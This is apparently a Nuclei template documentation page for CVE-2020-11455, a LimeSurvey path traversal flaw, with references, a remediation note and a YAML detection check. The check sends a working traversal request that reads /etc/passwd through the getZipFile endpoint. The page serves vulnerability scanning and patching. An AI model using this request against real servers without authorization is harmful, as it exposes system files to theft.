Skip to content
Nuclei Templates

LimeSurvey 4.1.11 - Local File Inclusion

ID: CVE-2020-11455

Severity: critical

Author: daffainfo

Tags: cve2020,cve,lfi,edb,packetstorm,limesurvey

Description

Section titled “Description”

LimeSurvey before 4.1.12+200324 is vulnerable to local file inclusion because it contains a path traversal vulnerability in application/controllers/admin/LimeSurveyFileManager.php.

YAML Source

Section titled “YAML Source”
id: CVE-2020-11455


info:
  name: LimeSurvey 4.1.11 - Local File Inclusion
  author: daffainfo
  severity: critical
  description: LimeSurvey before 4.1.12+200324 is vulnerable to local file inclusion because it contains a path traversal vulnerability in application/controllers/admin/LimeSurveyFileManager.php.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the server.
  remediation: |
    Upgrade to the latest version of LimeSurvey (4.1.12 or higher) which includes a fix for this vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/48297
    - https://github.com/LimeSurvey/LimeSurvey/commit/daf50ebb16574badfb7ae0b8526ddc5871378f1b
    - http://packetstormsecurity.com/files/157112/LimeSurvey-4.1.11-Path-Traversal.html
    - https://nvd.nist.gov/vuln/detail/CVE-2020-11455
    - https://github.com/KayCHENvip/vulnerability-poc
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-11455
    cwe-id: CWE-22
    epss-score: 0.87845
    epss-percentile: 0.98577
    cpe: cpe:2.3:a:limesurvey:limesurvey:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: limesurvey
    product: limesurvey
  tags: cve2020,cve,lfi,edb,packetstorm,limesurvey


http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php/admin/filemanager/sa/getZipFile?path=/../../../../../../../etc/passwd"


    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"


      - type: status
        status:
          - 200
# digest: 4a0a0047304502206006a353603eb2e07385af6fea02c748382bedf1cf184105320634c233e5ccbd0221008832f271d9754b922018da143b517dfeb7b57b43a186a996eae230707a311220:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2020/CVE-2020-11455.yaml"

View on Github